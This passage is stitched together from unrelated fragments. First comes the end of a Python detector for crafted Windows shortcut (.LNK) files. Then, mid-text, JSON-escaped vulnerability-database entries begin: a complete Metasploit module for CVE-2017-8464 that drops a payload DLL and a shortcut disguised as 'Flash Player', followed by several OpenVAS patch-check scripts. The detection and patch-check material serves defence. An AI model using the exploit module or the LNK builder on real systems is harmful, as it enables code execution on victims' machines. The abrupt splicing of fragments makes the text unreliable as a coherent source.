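    name = item[path_end:path_end + 2 * name_chars].decode("utf-16-le", "replace").rstrip("\x00")
    return path, name

def find_cpl_dll_load(data):
    """Return the DLL/CPL path a crafted LNK would have the shell load, else None."""
    flags = parse_header(data)
    pos, items = 0x4C, []
    if flags & HAS_LINK_TARGET_ID_LIST:
        items, pos = parse_idlist(data, pos)
    blocks = parse_extra_data(data, skip_optional_sections(data, pos, flags))
    special = blocks.get(SPECIAL_FOLDER_SIG, b"")
    if len(special) < 4 or struct.unpack_from("<I", special, 0)[0] != CSIDL_CONTROLS:
        return None                                          # no Control Panel folder override
    for item in items:
        applet = parse_cpl_applet_item(item)
        if applet and applet[0].lower().endswith((".dll", ".cpl")):
            return applet[0]
    return None

def build_lnk(dll_path, special_folder_id=None, applet=True, name="Flash Player"):
    """Constructed sample in the generators' layout (not a capture) to exercise the detector."""
    header = struct.pack("<I16sI", 0x4C, LINK_CLSID.bytes_le,
                         HAS_LINK_TARGET_ID_LIST | IS_UNICODE) + bytes(0x4C - 24)
    items = [THIS_PC_ITEM]
    if applet:
        path_u = (dll_path + "\x00").encode("utf-16-le")
        name_u = (name + "\x00").encode("utf-16-le")
        items.append(bytes(11) + b"\x6a" + bytes(6) + struct.pack("<HH", len(path_u) // 2, len(name_u) // 2)
                     + path_u + name_u + b"\x00\x00")
    idlist = b"".join(struct.pack("<H", len(i) + 2) + i for i in items) + b"\x00\x00"
    extra = b"" if special_folder_id is None else struct.pack("<IIII", 0x10, SPECIAL_FOLDER_SIG, special_folder_id, 0x14)
    return header + struct.pack("<H", len(idlist)) + idlist + extra + bytes(4)

if __name__ == "__main__":
    import sys
    for fname in sys.argv[1:]:
        with open(fname, "rb") as f:
            hit = find_cpl_dll_load(f.read())
        print(f"{fname}: {'would load ' + hit if hit else 'no CPL applet/DLL pattern'}")
```

Invoked with one or more .lnk paths it prints the path each file would load, or "no CPL applet/DLL pattern". The detector keys on the SpecialFolderDataBlock rather than on the DLL name alone because that block is what the modules above add on top of the MS15-020 layout; a shortcut that names a .dll in some other ItemID encoding is not decoded here, so treat a miss as "pattern not found", not as proof the file is clean.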
If no PATH is specified, the module defaults to %USERPROFILE%.\r\n },\r\n 'Author' =>\r\n [\r\n 'Uncredited', # vulnerability discovery\r\n 'Yorick Koster', # msf module\r\n 'Spencer McIntyre' # msf module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2017-8464'],\r\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],\r\n ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'], # writeup\r\n ['URL', 'https://msdn.microsoft.com/en-us/library/dd871305.aspx'], # [MS-SHLLINK]: Shell Link (.LNK) Binary File Format\r\n ['URL', 'http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm'],\r\n ['URL', 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf']\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'process',\r\n 'FileDropperDelay' => 15,\r\n 'WfsDelay' => 30\r\n },\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Payload' =>\r\n {\r\n 'Space' => 2048\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ],\r\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ]\r\n ],\r\n 'DefaultTarget' => 0, # Default target is Automatic\r\n 'DisclosureDate' => 'Jun 13 2017'\r\n )\r\n )\r\n\r\n register_options(\r\n [\r\n OptString.new('FILENAME', [false, 'The LNK file']),\r\n OptString.new('DLLNAME', [false, 'The DLL file containing the payload']),\r\n OptString.new('PATH', [false, 'An explicit path to where the files should be written to'])\r\n ]\r\n )\r\n\r\n register_advanced_options(\r\n [\r\n OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),\r\n OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player'])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n if session.sys.process['SearchIndexer.exe']\r\n return Exploit::CheckCode::Detected\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def 
get_name(option, default_ext)\r\n name = datastore[option].to_s.strip\r\n name = \"#{rand_text_alpha(16)}.#{default_ext}\" if name.blank?\r\n name\r\n end\r\n\r\n def exploit\r\n if is_system?\r\n fail_with(Failure::None, 'Session is already elevated')\r\n end\r\n\r\n if session.platform != 'windows'\r\n fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')\r\n end\r\n\r\n if check == Exploit::CheckCode::Safe\r\n fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')\r\n end\r\n\r\n if sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86\r\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\r\n elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64\r\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\r\n end\r\n\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464')\r\n arch = target['Arch'] == ARCH_ANY ? 
payload.arch.first : target['Arch']\r\n datastore['EXE::Path'] = path\r\n datastore['EXE::Template'] = ::File.join(path, \"template_#{arch}_windows.dll\")\r\n\r\n path = datastore['PATH'] || session.fs.file.expand_path(\"%USERPROFILE%\")\r\n path.chomp!(\"\\\\\")\r\n\r\n dll_path = \"#{path}\\\\#{get_name('DLLNAME', 'dll')}\"\r\n write_file(dll_path, generate_payload_dll)\r\n\r\n lnk_path = \"#{path}\\\\#{get_name('FILENAME', 'lnk')}\"\r\n write_file(lnk_path, generate_link(dll_path))\r\n register_files_for_cleanup(dll_path, lnk_path)\r\n end\r\n\r\n def file_rm(file)\r\n if file_dropper_delete(session, file) && @dropped_files && file_dropper_deleted?(session, file, true)\r\n @dropped_files.delete(file)\r\n end\r\n end\r\n\r\n def generate_link(path)\r\n vprint_status(\"Generating LNK file to load: #{path}\")\r\n path += \"\\x00\" # Do not use << here\r\n display_name = datastore['LnkDisplayName'].dup << \"\\x00\" # LNK Display Name\r\n comment = datastore['LnkComment'].dup << \"\\x00\"\r\n\r\n # Control Panel Applet ItemID with our DLL\r\n cpl_applet = [\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00\r\n ].pack('C*')\r\n cpl_applet << [path.length].pack('v')\r\n cpl_applet << [display_name.length].pack('v')\r\n cpl_applet << path.unpack('C*').pack('v*')\r\n cpl_applet << display_name.unpack('C*').pack('v*')\r\n cpl_applet << comment.unpack('C*').pack('v*')\r\n\r\n # LinkHeader\r\n ret = [\r\n 0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C\r\n 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046\r\n 0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode)\r\n 0x00, 0x00, 0x00, 0x00, # FileAttributes\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, # WriteTime\r\n 0x00, 0x00, 0x00, 0x00, # FileSize\r\n 0x00, 0x00, 0x00, 0x00, # IconIndex\r\n 0x00, 0x00, 0x00, 0x00, # ShowCommand\r\n 0x00, 0x00, # HotKey\r\n 0x00, 0x00, # Reserved1\r\n 0x00, 0x00, 0x00, 0x00, # Reserved2\r\n 0x00, 0x00, 0x00, 0x00 # Reserved3\r\n ].pack('C*')\r\n\r\n # IDList\r\n idlist_data = ''\r\n # ItemID = ItemIDSize (2 bytes) + Data (variable)\r\n idlist_data << [0x12 + 2].pack('v')\r\n idlist_data << [\r\n # All Control Panel Items\r\n 0x1f, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,\r\n 0x30, 0x9d\r\n ].pack('C*')\r\n # ItemID = ItemIDSize (2 bytes) + Data (variable)\r\n idlist_data << [cpl_applet.length + 2].pack('v')\r\n idlist_data << cpl_applet\r\n idlist_data << [0x00].pack('v') # TerminalID\r\n\r\n # LinkTargetIDList\r\n ret << [idlist_data.length].pack('v') # IDListSize\r\n ret << idlist_data\r\n\r\n # ExtraData\r\n # SpecialFolderDataBlock\r\n ret << [\r\n 0x10, 0x00, 0x00, 0x00, # BlockSize\r\n 0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005\r\n 0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\\Control Panel)\r\n 0x14, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList\r\n ].pack('C*')\r\n # TerminalBlock\r\n ret << [0x00, 0x00, 0x00, 0x00].pack('V')\r\n ret\r\n end\r\nend\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/28973", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-01-08T13:49:25", "description": "This host is missing a critical security\n update according to Microsoft KB4021903", "cvss3": {}, "published": "2017-06-14T00:00:00", "type": "openvas", "title": "Microsoft Windows LNK Remote Code Execution Vulnerability (KB4021903)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8464"], "modified": "2019-12-20T00:00:00", "id": "OPENVAS:1361412562310811159", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310811159", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows LNK Remote Code Execution Vulnerability (KB4021903)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811159\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2017-8464\");\n script_bugtraq_id(98818);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-14 09:16:15 +0530 (Wed, 14 Jun 2017)\");\n script_name(\"Microsoft Windows LNK Remote Code Execution Vulnerability (KB4021903)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4021903\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n 
script_tag(name:\"insight\", value:\"The flaw exists due to an error when\n Microsoft Windows allow a .LNK file to be processed.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to gain the same user rights as the local user.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Vista x32/x64 Edition Service Pack 2\n\n - Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4021903\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4025687\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3, winVista:3, winVistax64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Shell32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.0.6002.19785\"))\n{\n Vulnerable_range = \"Less than 6.0.6002.19785\";\n VULN = TRUE ;\n}\n\nelse if(version_in_range(version:fileVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24101\"))\n{\n Vulnerable_range = \"6.0.6002.23000 - 6.0.6002.24101\";\n VULN = TRUE ;\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\Shell32.dll\" + '\\n' +\n 
'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:29:02", "description": "This host is missing an important security\n update according to Microsoft KB3213624", "cvss3": {}, "published": "2017-07-12T00:00:00", "type": "openvas", "title": "Microsoft Office 2010 Service Pack 2 Remote Code Execution Vulnerability (KB3213624)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8570"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811233", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811233", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Office 2010 Service Pack 2 Remote Code Execution Vulnerability (KB3213624)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811233\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8570\");\n script_bugtraq_id(99445);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 12:27:17 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Office 2010 Service Pack 2 Remote Code Execution Vulnerability (KB3213624)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB3213624\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error in Microsoft\n Office software when it fails to properly handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to use a specially crafted file to perform actions in the security context of\n the current user.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Office 2010 Service Pack 2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/3213624\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"MS/Office/Ver\");\n script_require_ports(139, 445);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\n## MS Office Version\nofficeVer = get_kb_item(\"MS/Office/Ver\");\nif(!officeVer){\n exit(0);\n}\n\ncommonpath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\nif(!commonpath){\n exit(0);\n}\n\nif(officeVer =~ \"^(14\\.)\")\n{\n ##Office Path\n offPath = commonpath + \"\\Microsoft Shared\\Office14\";\n\n offexeVer = fetch_file_version(sysPath:offPath, file_name:\"Mso.dll\");\n\n if(offexeVer && version_in_range(version:offexeVer, test_version:\"14.0\", test_version2:\"14.0.7184.4999\"))\n {\n report = 'File checked: ' + offPath + \"\\Mso.dll\" + '\\n' +\n 'File version: ' + offexeVer + '\\n' +\n 'Vulnerable range: ' + '14.0 - 14.0.7184.4999' + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:19:57", "description": "This host is missing an important security\n update according to Microsoft KB3213555", "cvss3": {}, "published": "2017-07-12T00:00:00", "type": "openvas", "title": "Microsoft Office 2013 Service Pack 1 Remote Code Execution Vulnerability (KB3213555)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8570"], "modified": "2020-06-04T00:00:00", "id": 
"OPENVAS:1361412562310811451", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811451", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Office 2013 Service Pack 1 Remote Code Execution Vulnerability (KB3213555)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811451\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8570\");\n script_bugtraq_id(99445);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 08:22:48 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Office 2013 Service Pack 1 Remote Code Execution Vulnerability (KB3213555)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB3213555\");\n\n script_tag(name:\"vuldetect\", 
value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists when it fails to\n properly handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to use a specially crafted file to perform actions in the security context of\n the current user.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Office 2013 Service Pack 1.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/3213555\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"MS/Office/Ver\");\n script_require_ports(139, 445);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\n## MS Office Version\nofficeVer = get_kb_item(\"MS/Office/Ver\");\nif(!officeVer){\n exit(0);\n}\n\ncommonpath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\nif(!commonpath){\n exit(0);\n}\n\nif(officeVer =~ \"^(15\\.)\")\n{\n ##Office Path\n offPath = commonpath + \"\\Microsoft Shared\\Office15\";\n\n offexeVer = fetch_file_version(sysPath:offPath, file_name:\"Mso.dll\");\n\n if(offexeVer && version_in_range(version:offexeVer, test_version:\"15.0\", test_version2:\"15.0.4945.1000\"))\n {\n report = 'File checked: ' + offPath + \"\\Mso.dll\" + '\\n' +\n 'File version: ' + offexeVer + '\\n' +\n 'Vulnerable range: ' + '15.0 - 15.0.4945.1000' + '\\n' ;\n 
security_message(data:report);\n exit(0);\n }\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:22:53", "description": "This host is missing an important security\n update according to Microsoft KB3213640", "cvss3": {}, "published": "2017-07-12T00:00:00", "type": "openvas", "title": "Microsoft Office 2007 Service Pack 3 Remote Code Execution Vulnerability (KB3213640)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8570"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811232", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811232", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Office 2007 Service Pack 3 Remote Code Execution Vulnerability (KB3213640)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811232\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8570\");\n script_bugtraq_id(99445);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 12:22:24 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Office 2007 Service Pack 3 Remote Code Execution Vulnerability (KB3213640)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB3213640\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error in Microsoft\n Office software when it fails to properly handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to use a specially crafted file to perform actions in the security context of\n the current user.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Office 2007 Service Pack 3.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/3213640\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"MS/Office/Ver\");\n script_require_ports(139, 445);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\n## MS Office Version\nofficeVer = get_kb_item(\"MS/Office/Ver\");\nif(!officeVer){\n exit(0);\n}\n\ncommonpath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\nif(!commonpath){\n exit(0);\n}\n\nif(officeVer =~ \"^(12\\.)\")\n{\n ##Office Path\n offPath = commonpath + \"\\Microsoft Shared\\Office12\";\n\n offexeVer = fetch_file_version(sysPath:offPath, file_name:\"Mso.dll\");\n\n if(offexeVer && version_in_range(version:offexeVer, test_version:\"12.0\", test_version2:\"12.0.6772.4999\"))\n {\n report = 'File checked: ' + offPath + \"\\Mso.dll\" + '\\n' +\n 'File version: ' + offexeVer + '\\n' +\n 'Vulnerable range: ' + '12.0 - 12.0.6772.4999' + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:27:31", "description": "This host is missing an important security\n update according to Microsoft KB3213545", "cvss3": {}, "published": "2017-07-12T00:00:00", "type": "openvas", "title": "Microsoft Office 2016 Remote Code Execution Vulnerability (KB3213545)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8570"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811231", 
"href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811231", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Office 2016 Remote Code Execution Vulnerability (KB3213545)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811231\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8570\");\n script_bugtraq_id(99445);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-07-12 12:14:16 +0530 (Wed, 12 Jul 2017)\");\n script_name(\"Microsoft Office 2016 Remote Code Execution Vulnerability (KB3213545)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB3213545\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n 
script_tag(name:\"insight\", value:\"The flaw exists due to an error in Microsoft\n Office software when it fails to properly handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to use a specially crafted file to perform actions in the security context of\n the current user.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Office 2016.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/3213545\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"MS/Office/Ver\");\n script_require_ports(139, 445);\n 